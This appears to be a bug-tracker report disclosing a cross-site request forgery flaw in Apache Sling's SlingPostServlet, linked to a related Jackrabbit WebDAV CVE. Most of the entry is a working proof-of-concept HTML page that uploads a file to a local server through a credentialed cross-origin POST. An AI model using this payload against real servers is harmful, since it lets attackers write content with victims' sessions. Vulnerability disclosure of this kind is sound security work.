Description
The SlingPostServlet creates a resource from a cross-site request like so:
<html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost:8080/test/csrf.txt", true); xhr.withCredentials = true; var body = "This file has been uploaded via CSRF.=\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html>
Attachments
Attachments
Issue Links
- relates to
-
JCR-4002 CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801)
- Closed